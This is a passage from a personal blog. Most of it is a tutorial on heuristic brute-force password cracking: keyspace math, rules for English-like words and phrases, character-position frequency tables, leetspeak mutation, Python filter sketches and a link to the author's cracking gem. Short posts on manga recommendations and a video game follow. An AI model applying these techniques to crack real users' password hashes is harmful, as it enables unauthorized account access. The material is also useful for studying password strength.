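14 (27^14)    109,418,989,131,512,359,209
15 (27^15)    2,954,312,706,550,833,698,643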


That's a total of 3,067,940,118,341,250,379,359 combinations.
At a rate of testing 50 hashes per second, it would take about 1,945,674,859,424 years to try every possible combination. That's almost two trillion years!
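If you'd like to check the math yourself, a few lines of Python 3 will do it. This sketch assumes 365-day years and rounds down to whole years; the function names are hypothetical.

```python
SECONDS_PER_YEAR = 365 * 24 * 60 * 60  # assumes 365-day years


def total_combinations(alphabet_size, min_length, max_length):
    """Sum alphabet_size**n for every length n in [min_length, max_length]."""
    return sum(alphabet_size ** n for n in range(min_length, max_length + 1))


def years_to_exhaust(combinations, hashes_per_second):
    """Whole years needed to test every combination at a fixed rate."""
    return combinations // (hashes_per_second * SECONDS_PER_YEAR)


total = total_combinations(27, 1, 15)  # a-z plus the space character
print(total)                           # 3067940118341250379359
print(years_to_exhaust(total, 50))     # 1945674859424
```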

Now I'm not sure about you, but waiting a couple trillion years to crack someone's password sucks. So let's try cutting down that brute forcing time, by operating under the assumption that our target password has to be at least seven characters long. That means that we only need to calculate the combinations of the letters a-z and the space (" ") from a length of seven characters to at least fifteen characters. Let's see how our math looks now.


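Length        Total Combinations
7 (27^7)      10,460,353,203
8 (27^8)      282,429,536,481
9 (27^9)      7,625,597,484,987
10 (27^10)    205,891,132,094,649
11 (27^11)    5,559,060,566,555,523
12 (27^12)    150,094,635,296,999,121
13 (27^13)    4,052,555,153,018,976,267
14 (27^14)    109,418,989,131,512,359,209
15 (27^15)    2,954,312,706,550,833,698,643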


That's a total of 3,067,940,118,340,848,058,083 combinations.
At a rate of testing 50 hashes per second, it would still take about 1,945,674,859,424 years to try every possible combination. Skipping lengths one through six only removes about 402 million combinations, which is a rounding error next to the total, so we're still stuck at almost two trillion years!


From the information above we've learned that dictionary attacks are nice, but aren't much help when trying to crack a password more complicated than something your grandma might come up with (i.e. passwords consisting of more than just a single word, or that include non-standard portmanteaus). We've also learned that using a brute force attack will (eventually) crack any target password with a 100% rate of success, but it'll probably take a few eons to crack longer, more complicated passwords.

So what's a devilishly good looking super hacker to do? Why the answer is obvious. You need to use a smarter brute forcing algorithm!

Before We Continue

You may have noticed that I've conveniently forgotten to mention anything about passwords that include numbers or funky punctuation ($, &, @, etc). It's not that I don't acknowledge the existence of passwords like these, it's just that at this point we're only going to focus on passwords that use the letters a-z, spaces (" "), hyphens and underscores (- _), and common grammatical punctuation (. , ' ? !). I'll address all those kooky complicated passwords later on.

The Psychology of Password Creation

The primary issue with using a brute force attack to crack most real world passwords is that it spends a ton of time comparing hashes generated from phrases like,

  • aaaaaaaaa
  • aaacccaad
  • xcv hjj abu
  • hhgdfgdrfg

Now these are all spiffy secure passwords, but you'd be hard pressed to find someone who would actually use a password like one of these. Granted, there is a select group of paranoid types who I'm sure use passwords like these all the time, but more often than not people tend to pick passwords that they can actually remember; passwords that actually contain words. These words may not necessarily always be separated by spaces, be spelled correctly, or even appear in a dictionary, but they are all still at least words. They are phrases that can be read aloud, and phrases that people say aloud in their minds as they type them in.

Take for instance the words "falcon" and "punch", and all of the different ways they could be arranged to make a password. A few possible combinations would be "falcon punch", "falconpunch", "falcon punch!", "falconpunch!", and "falcon, punch!". Looking at these passwords, no matter how they're put together, the resulting password always includes the words "falcon" and "punch", and when you read it out loud, it's "falcon punch".

So in order to crack 'regular passwords' (i.e. passwords that aren't random sequences of nonsense), we need a more heuristic brute forcing algorithm that doesn't waste its time on unrealistic passwords like "aaaa" and "asdxcv", but instead focuses exclusively on generating passwords made up of words that adhere to the rules of English-like words and phrases.

What is an English-like Word or Phrase?

An English-like word is a word that may not necessarily be an actual English word, but still adheres to a series of rules that our brains use to determine whether or not a given sequence of characters qualifies as a "word". Therefore, an English-like phrase is a grouping of two or more English-like words that adhere to the rules that determine whether or not a group of words qualifies as a valid phrase.

Take for instance this article you're reading right now. As you take in each word, your brain is running a series of tests to make sure that the word you're looking at is actually a word, and not just a bunch of random letters. If I were to drop the word 'kguifdgj' in the middle of a sentence, your brain would automatically flag that word as not being a valid word because it doesn't follow the 'rules' of English-like words. That is, certain rules that every word follows in order to be considered a valid word by our brains. Therefore, you would conclude that that particular sentence was not a valid sentence because it wasn't made up entirely of valid words.

So in order to create a brute forcing algorithm that doesn't waste its time on nonsense words like "sfdre" and "86ugkie65", we need to 'teach' it how to perform at least some of those same tests that our brain does for us automatically, so that it can determine whether a word or phrase is valid or just gibberish. By doing this, we create a brute force algorithm that only generates possible passwords that an everyday person would potentially use, which in turn drastically reduces the amount of time spent generating extremely unlikely passwords.

The Rules of English-like Words


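Apostrophes

A word cannot include more than one apostrophe. If a word includes an apostrophe, it can only be positioned as the last character, or second to last character, in the word. Moreover, the letter bordering the apostrophe at the end of the word must be an s: the letter before it when the apostrophe is the last character, or the letter after it when the apostrophe is second to last.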


  • chuck's is a valid word
  • chucks' is a valid word
  • chuck'x is not a valid word
  • ch'uks is not a valid word
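As a rough sketch, the apostrophe rule could be checked like this in Python 3. The function name is hypothetical, and it assumes the word has already been lowercased.

```python
def passes_apostrophe_rule(word):
    """Allow at most one apostrophe, and only as part of a trailing 's or s'."""
    count = word.count("'")
    if count == 0:
        return True
    if count > 1:
        return False
    # With exactly one apostrophe, it must sit right next to a final "s".
    return word.endswith("'s") or word.endswith("s'")


for word in ["chuck's", "chucks'", "chuck'x", "ch'uks"]:
    print(word, passes_apostrophe_rule(word))
```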

Hyphens and Underscores

A word cannot include both hyphens and underscores. If a word includes hyphens or underscores, the word should be split at that punctuation, and each resulting word should be tested independently for whether or not it is a valid English-like word.


  • snape-kills_dumbledore is not valid
  • light_sabers_are_awesome should be split at the underscores, and the individual words should be tested separately to determine whether they are valid or not. If any of the individual words are invalid, then the entire word is invalid as well.
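Here's one way the hyphen and underscore rule might be sketched in Python 3. Both function names are hypothetical, and `is_valid_word` is a stand-in for whatever single-word check you plug in (the usage lines just borrow `str.isalpha`).

```python
import re


def split_compound(word):
    """Split a word at hyphens or underscores.

    Returns None when the word mixes both separators, which the rule forbids.
    """
    if "-" in word and "_" in word:
        return None
    return re.split(r"[-_]", word)


def passes_separator_rule(word, is_valid_word):
    """Apply a caller-supplied word check to every piece of a compound word."""
    parts = split_compound(word)
    if parts is None:
        return False
    return all(is_valid_word(part) for part in parts)


print(passes_separator_rule("falcon_punch", str.isalpha))            # True
print(passes_separator_rule("snape-kills_dumbledore", str.isalpha))  # False
```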

Ending Punctuation (! ? , .)

A word cannot include more than one instance of ending punctuation, and any occurrence of such punctuation can only be positioned as the last character of a word.

Other Punctuation ($, &, @, etc)

A word cannot include any instances of other punctuation.
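The two punctuation rules above fit comfortably in one small check. This is only a sketch in Python 3: the allowed character set (a-z, apostrophe, hyphen, underscore, and the four ending marks) is my reading of the rules so far, and the names are hypothetical.

```python
ENDING_PUNCTUATION = set("!?,.")
ALLOWED_CHARACTERS = set("abcdefghijklmnopqrstuvwxyz'-_") | ENDING_PUNCTUATION


def passes_punctuation_rules(word):
    """Reject other punctuation; allow one ending mark as the final character."""
    if any(char not in ALLOWED_CHARACTERS for char in word):
        return False  # "other" punctuation, digits, and so on
    body = word[:-1]  # everything except the final character
    # If no ending mark appears before the last character, there can be at
    # most one of them, and it can only be in the final position.
    return not any(char in ENDING_PUNCTUATION for char in body)


for word in ["punch!", "punch!!", "pu!nch", "p@nch"]:
    print(word, passes_punctuation_rules(word))
```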


Suffixes

If a word ends in a known suffix (ing, ist, scope, ology, etc), the last character before the suffix cannot be the same as the first letter of the suffix.


  • psychology is a valid word
  • psychoology is not a valid word

Note: There are a few words that don't follow this rule, like zoology. However since words like these are the (rare) exception to the rule, it's more effective to just ignore them.
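A quick Python 3 sketch of the suffix rule follows. The suffix tuple only holds the four examples named above, so treat it as a placeholder for a much longer list; the function name is hypothetical.

```python
# A tiny sample of suffixes; a real list would be much longer.
SUFFIXES = ("ology", "scope", "ing", "ist")


def passes_suffix_rule(word, suffixes=SUFFIXES):
    """Reject words whose stem ends with the first letter of their suffix."""
    for suffix in suffixes:
        if word.endswith(suffix) and len(word) > len(suffix):
            stem = word[: -len(suffix)]
            if stem[-1] == suffix[0]:
                return False
    return True


print(passes_suffix_rule("psychology"))   # True
print(passes_suffix_rule("psychoology"))  # False
print(passes_suffix_rule("zoology"))      # False, one of the rare exceptions
```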


Vowels

Words must include at least one vowel.

Character Repetition Patterns

The same character can never be repeated more than twice in a row.


  • books is a valid word
  • boooks is not a valid word

The same sequence of characters can never be repeated more than twice in a row.


  • mahimahi is a valid word
  • mahimahimahi is not a valid word
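The vowel rule and both repetition rules are easy to express with a couple of regular expressions. This Python 3 sketch uses hypothetical names, and leaving 'y' out of the vowel list is an assumption on my part.

```python
import re

VOWELS = "aeiou"  # add "y" if you want words like "rhythm" to pass

# The same character three or more times in a row, e.g. "ooo".
TRIPLE_CHARACTER = re.compile(r"(.)\1\1")
# The same multi-character sequence three or more times in a row.
TRIPLE_SEQUENCE = re.compile(r"(..+)\1\1")


def has_vowel(word):
    """True if the word contains at least one vowel."""
    return any(char in VOWELS for char in word)


def passes_repetition_rules(word):
    """True if no character or sequence repeats more than twice in a row."""
    return not (TRIPLE_CHARACTER.search(word) or TRIPLE_SEQUENCE.search(word))


for word in ["books", "boooks", "mahimahi", "mahimahimahi"]:
    print(word, passes_repetition_rules(word))
```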

Character Position Analysis

One of the great things about computers is that they're very good at performing simple tasks over and over really fast. Because of this trait, there are certain tests we can have the computer perform to validate words that wouldn't be efficient if you were verifying a word by hand. One such test is Character Position Analysis.

A Character Position Analysis is a test performed by iterating through each character in a word, and analyzing that character's relationship with its neighboring characters in order to determine whether or not certain characters 'fit' next to each other.

To perform a Character Position Analysis, you first need to build a database that documents how often characters appear directly next to, or one character apart from, each other. This database is broken up into three separate tables that keep track of occurrence patterns for:

  • the first three characters of a word (starters table)
  • the last three characters of a word (enders table)
  • and the characters in a word as a whole (neighbors table).

Below is an example table documenting the overall character occurrence patterns for the word "awesome". Each cell holds two numbers. The first number represents the number of times a character appears directly next to another character, and the second number represents the number of times a character appears one character apart from another character.

       a       e       m       o       s       w
a    0, 0    0, 1    0, 0    0, 0    0, 0    1, 0
e    0, 1    0, 0    1, 0    0, 1    1, 0    1, 0
m    0, 0    1, 0    0, 0    1, 0    0, 1    0, 0
o    0, 0    0, 1    0, 0    0, 0    1, 0    0, 0
s    0, 0    1, 0    0, 1    1, 0    0, 0    0, 1
w    1, 0    1, 0    0, 0    0, 0    0, 1    0, 0

From the data in the table above, we can conclude that the letters 'a', 'e', 'm', 'o', and 's' never appear directly after the letter 'a'. We can then use this data to verify whether or not other words are valid. For example the word "amber" would be considered not valid, because the letter 'm' appears directly after the letter 'a' which our occurrence patterns table tells us isn't possible.

Well obviously 'amber' is a valid word (anyone who's seen Jurassic Park knows that), but the data we have in the table above says otherwise. So in order to perform an accurate Character Position Analysis, a very large list of words must be analyzed in order to build a useful set of character position occurrence tables. Such a list of words can be found here, http://www.bsdlover.cn/study/UnixTree/V7/usr/dict/words.html
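For the curious, here's a minimal Python 3 sketch of how a neighbors table could be built from a word list. The nested dictionary layout and the decision to count each pair in both directions are assumptions of this sketch, not a description of any particular implementation.

```python
from collections import defaultdict


def build_neighbors_table(words):
    """Count how often each pair of characters sits adjacent or one apart.

    table[a][b] is a two-item list: [adjacent_count, one_apart_count].
    """
    table = defaultdict(lambda: defaultdict(lambda: [0, 0]))
    for word in words:
        for distance in (1, 2):
            for i in range(len(word) - distance):
                a, b = word[i], word[i + distance]
                table[a][b][distance - 1] += 1
                if a != b:  # record the pair in both directions
                    table[b][a][distance - 1] += 1
    return table


table = build_neighbors_table(["awesome"])
print(table["a"]["w"])  # [1, 0]
print(table["a"]["e"])  # [0, 1]
print(table["a"]["m"])  # [0, 0], which is why "amber" looks invalid

bigger = build_neighbors_table(["awesome", "amber"])
print(bigger["a"]["m"])  # [1, 0] once "amber" is part of the word list
```

The starters and enders tables could be built the same way by feeding in only the first three or last three characters of each word.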

Once you have a character position occurrence database, then you can perform a Character Position Analysis. A Character Position Analysis is broken up into three separate tests, and a word is only valid if it passes all three tests.

Starting Characters Position Analysis

This test is performed by taking the first three characters of a word, and checking in the starters table whether the occurrence count (aka neighbor score) for the first and second characters, or first and third characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.

Ending Characters Position Analysis

This test is performed by taking the last three characters of a word, and checking in the enders table whether the occurrence count (aka neighbor score) for the third to last and second to last characters, or third to last and last characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.

General Character Position Analysis

This test is performed by iterating through each character in a word, and checking in the neighbors table the occurrence count (aka neighbor score) for that character and the character directly next to it, and for that character and the character one character apart from it. If any of the neighbor scores is equal to zero, then the word is not valid.

Getting More Accurate Results

One way to get more accurate results when performing a Character Position Analysis is to reject any pair of characters whose neighbor score falls below a higher threshold, rather than only rejecting pairs with a score of zero.
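Putting the three tests together, a Character Position Analysis might be sketched like this in Python 3. Every name here is hypothetical, pairs are counted in both directions (an assumption), and the `minimum` argument plays the role of the neighbor score threshold.

```python
from collections import defaultdict


def build_table(chunks):
    """Map (a, b) -> [adjacent_count, one_apart_count] over all chunks."""
    table = defaultdict(lambda: [0, 0])
    for chunk in chunks:
        for distance in (1, 2):
            for i in range(len(chunk) - distance):
                a, b = chunk[i], chunk[i + distance]
                table[a, b][distance - 1] += 1
                if a != b:  # count the pair in both directions (an assumption)
                    table[b, a][distance - 1] += 1
    return dict(table)


def build_tables(corpus):
    """Return the (starters, enders, neighbors) tables for a list of words."""
    return (
        build_table(word[:3] for word in corpus),
        build_table(word[-3:] for word in corpus),
        build_table(corpus),
    )


def position_passes(text, i, table, minimum):
    """Score text[i] against the characters one and two places after it."""
    for distance in (1, 2):
        if i + distance < len(text):
            scores = table.get((text[i], text[i + distance]), (0, 0))
            if scores[distance - 1] < minimum:
                return False
    return True


def is_plausible_word(word, tables, minimum=1):
    """Run the starters, enders, and general tests; all three must pass."""
    starters, enders, neighbors = tables
    return (
        position_passes(word[:3], 0, starters, minimum)
        and position_passes(word[-3:], 0, enders, minimum)
        and all(position_passes(word, i, neighbors, minimum)
                for i in range(len(word)))
    )


tables = build_tables(["awesome"])
print(is_plausible_word("awesome", tables))  # True
print(is_plausible_word("amber", tables))    # False
```

With `minimum=1` a pair fails only when its score is zero; passing a larger value gives you the stricter threshold.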

Rules of English-like Phrases


Spaces

A valid English-like phrase cannot include any occurrence of three or more space characters (" ") in a row. On instances of two spaces in a row, the phrase should be split at the double space, and each sub-phrase should be tested separately. If any of the sub-phrases are not valid, then the entire phrase is not valid.


  • "row row fight the power" is a valid phrase
  • "it's dangerous to go alone,   take this" is not a valid phrase (because there are three spaces in a row)

Word Repetition

The same word can never be repeated more than three times in a valid English-like phrase.


  • "row row fight the power" is a valid phrase
  • "row row row row your boat" is not a valid phrase

Phrase Ending Punctuation (! ? .)

Phrase ending punctuation may only appear at the end of a phrase.


  • "zelda is so over powered in brawl!" is a valid phrase
  • "zelda is so! over powered in brawl!" is not a valid phrase


Commas

Commas may only appear at the end of words, and never at the end of a phrase.


  • "charizard is cool, but so is blastoise" is a valid phrase
  • "cooking is so fun," is not a valid phrase


In order for an English-like phrase to be considered valid, each word in the phrase must be a valid English-like word.
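The phrase rules could be strung together along these lines. This is a Python 3 sketch with hypothetical names; `simple_word_check` is only a stand-in for a real English-like word test, and counting repeated words with trailing punctuation stripped is an assumption.

```python
from collections import Counter

PHRASE_ENDERS = ("!", "?", ".")


def simple_word_check(word):
    """Stand-in word test: letters only, ignoring apostrophes and end marks."""
    return word.rstrip("!?.,").replace("'", "").isalpha()


def is_valid_phrase(phrase, is_valid_word=simple_word_check):
    if "   " in phrase:  # three or more spaces in a row
        return False
    if "  " in phrase:  # split at double spaces and test each sub-phrase
        return all(is_valid_phrase(part, is_valid_word)
                   for part in phrase.split("  "))
    words = phrase.split(" ")
    bare_words = [word.rstrip("!?.,") for word in words]
    if any(count > 3 for count in Counter(bare_words).values()):
        return False  # the same word shows up more than three times
    for position, word in enumerate(words):
        is_last = position == len(words) - 1
        if word.endswith(PHRASE_ENDERS) and not is_last:
            return False  # ! ? . may only end the phrase
        if word.endswith(",") and is_last:
            return False  # a comma can never end the phrase
        if not is_valid_word(word):
            return False
    return True


print(is_valid_phrase("row row fight the power"))             # True
print(is_valid_phrase("row row row row your boat"))           # False
print(is_valid_phrase("zelda is so! over powered in brawl!")) # False
print(is_valid_phrase("cooking is so fun,"))                  # False
```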

So what about those passwords that include numbers, or goofy punctuation?

While heuristic brute forcing algorithms are great for generating English-like words and phrases, things get a lot more complicated if your target password includes numbers or funky punctuation ($, &, @, etc).

Going back to the topic of the psychology of password creation, remember that in general people pick passwords that are actually made up of words. Keeping this in mind, we can reasonably conclude that passwords that include numbers and/or funky punctuation still follow this rule, but the word(s) in the password are obfuscated by these non-standard characters. Another point to consider for passwords that include numbers only, is that often they're just appended to the end of a password.

Take for instance the password "jalapeno". It's a valid English-like word, and using it as a base, you can obfuscate it with numbers and funky punctuation.


  • "jalapen0", "jalap3no", "j414p3n0" - letters replaced with numbers
  • "jalapeno1", "jalapeno123" - numbers appended
  • "j@l@peno" - letters replaced with punctuation

All of the passwords above would not be considered valid English-like words, but under all of the numbers and punctuation, they actually are. So in order to crack passwords that include numbers and/or funky punctuation using a heuristic brute force algorithm, you need to develop a method that can mutate strings generated by the algorithm (making alterations like in the examples above) and then test all the password variants as well as the original password string against your target hash.
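A mutation step like that might be sketched as follows in Python 3. The substitution table and the list of appended numbers are hypothetical and deliberately tiny; a real cracker would want far more of both.

```python
from itertools import product

# Hypothetical substitution table; extend it to taste.
SUBSTITUTIONS = {"a": "a4@", "e": "e3", "l": "l1", "o": "o0"}
COMMON_SUFFIXES = ("", "1", "123")


def mutate(word):
    """Yield the original word plus its obfuscated variants."""
    # Each character becomes a string of options: itself plus any swaps.
    options = [SUBSTITUTIONS.get(char, char) for char in word]
    for combo in product(*options):
        base = "".join(combo)
        for suffix in COMMON_SUFFIXES:
            yield base + suffix


variants = set(mutate("jalapeno"))
for password in ["jalapen0", "j414p3n0", "jalapeno123", "j@l@peno"]:
    print(password, password in variants)
```

Each variant would then be hashed and compared against the target hash, right alongside the unmodified word.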

Are there any heuristic brute forcing programs available?

Why yes there are! I maintain a small proof-of-concept Ruby application/gem that implements heuristic brute forcing. See, http://github.com/jamespenguin/gentle-brute for more details.


Conclusion

Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords.

To illustrate my point, let's pit heuristic brute forcing against standard brute forcing to crack a five character password consisting of the letters a-z.

  • Using heuristic brute forcing (via the Ruby program above): 517,839 potential phrases
  • Using standard brute forcing: 11,881,376 potential phrases

That's 96% fewer phrases to try using heuristic brute forcing, compared to standard brute forcing!

Five Manga You Should Definitely Check Out

March 21, 2012 at 12:00 PM

Ever since I started developing the iManga Reader app back in 2009, I've had the chance to read a lot of different manga. So, listed below in no particular order are five manga that I recommend you check out.


Yotsuba&!

My Thoughts
Yotsuba is basically what you would get if you were to combine Calvin and Hobbes with Azumanga Daioh. It's about as delightful as a series can get, and will definitely make you smile.

Series Description
Yotsuba is a strange little girl with a big personality! Even in the most trivial, unremarkable encounters, Yotsuba's curiosity and enthusiasm quickly turns the everyday into the extraordinary!

Yotsuba&! received an Excellence Award for Manga at the 2006 Japan Media Arts Festival. In 2008 Yotsuba&! was nominated for the 12th Osamu Tezuka Culture Award and the Eisner Award "Best Publication for Kids" category, but did not win either, and was runner-up for the first annual Manga Taisho award.

11 Volumes (Ongoing)

Full Metal Panic! Sigma

My Thoughts
If you liked the Full Metal Panic! The Second Raid anime, then you will love this manga. The events from the TSR anime cover about the first twenty chapters of Full Metal Panic! Sigma, and there is a lot more story to get through after that. The manga is an adaptation of the Full Metal Panic! light novels, and will (once it's finished being released) cover the entirety of the FMP story.

Series Description
Following the Tuatha de Danaan's seajacking incident, things are back to normal at Jindai High School in Tokyo, or as normal as they get with Sousuke guarding Kaname. After finding out who betrayed Mithril and caused the seajacking incident, Kurz and Mao are sent on a top secret mission in order to capture and bring the traitor back.

However, Sousuke and Kaname's lives are about to change when they meet Leonard Testarossa, a high ranking member of a mysterious group named Amalgam. After their meeting, Leonard warns her that he would do anything to recruit her even if it means war in the streets of Tokyo.

16 Volumes (Ongoing)


Beck

My Thoughts
I really liked the Beck anime, but it only covered the first one or two major story arcs of the manga, and there is a lot more that happens. One characteristic about Beck's story that I really enjoy, is that it never really gets stale. As time moves forward, the stakes are always being raised, and the band's situation is always changing. Also, whether they are seeing success or failure, the members of the band are always pushing forward toward their dream of becoming world famous. Beck is a fantastic manga, and if you enjoyed the anime in the slightest, you should start reading it immediately.

Series Description
For the first 14 years of his life, Yukio Tanaka has been one heck of a boring guy. He has no hobbies, weak taste in music, and only a small vestige of a personality. He yearns for an exciting life, but his shy, and somewhat neurotic personality makes him his own worst enemy. Little does he know that his life will be forever changed when he meets Ryusuke Minami, a wild and unpredictable 16-year old fresh from America, who happens to be in a rock-and-roll band named after his Frankenstein-like patched dog--Beck.

34 Volumes (Complete)


Ibitsu

My Thoughts
I think it's really hard to find "good" horror manga. It's just not a medium that lends itself well to creating a scary atmosphere. There are a few exceptions, like most of the things written by Junji Ito or Goth (listed below), but most of the horror manga I've come across has been pretty sub-par or overrated.

That being said, I loved Ibitsu. Remina Kanbe (pictured to the left) sets the standard for what it means to be yandere, and makes Yuno from Mirai Nikki seem reasonable and well adjusted. Because it's so short, Ibitsu's story wastes no time getting things started, and presses forward at a rapid pace that only intensifies as it progresses. It's a great story, and will have you thinking twice about telling people whether or not you have a sister by the time you've finished with it.

Series Description
A boy went to take his trash out late one night, and found a strange, creepy, gothic-lolita-dressed woman sitting amongst the garbage bags. She asked if he had a little sister, and he answered her, hurrying afterwards back to his apartment. When he looked out the window, she was gone. Who is the strange woman, and why does she give him such a bad feeling?

2 Volumes (Complete)

Bio-Meat: Nectar

My Thoughts
The story of Bio-Meat is basically the gray goo end-of-the-world scenario brought to life in the form of organic-material-eating monsters designed to replace pigs and cows as humanity's source of delicious meat products.

There are two things that I really enjoy about Bio-Meat. The first is that the inevitable loss of control of the BM monsters isn't some unexplained, world-wide, all-hope-is-lost apocalypse like a zombie outbreak always seems to be. Instead, the outbreak is portrayed as more of a war with the BM, where the balance of power on both sides shifts back and forth as the plot progresses.

The other thing I really enjoyed about this manga is that its story spans a lot of time with the same characters. There are three major story arcs, which are each separated by about 5 to 10 years, and it's nice to read an end-of-the-world manga where you get to see how things progress (and fall apart) as time marches forward.

Series Description
Japan was in need of food. Bio-engineers had the solution, BioMeat. A thing which feeds on everything but glass and vinyl. In return they produce a endless supply of food. One day a BM escapes into the city. What will happen with a killing machine on the loose?

12 Volumes (Complete)

BRB, Embracing Eternity

March 6, 2012 at 12:00 PM

Just bought this today, suuuuper stoked to play it. I will say this though, I am not very happy that EA has chosen to hold my game hostage until I install their Steam rip-off, and register an account with them.

At least they aren't making me install Gamespy or Bonzi Buddy :/

IP hostage negotiations aside, it's time to go save the universe, and make this happen.


Copyright © Brandon Smith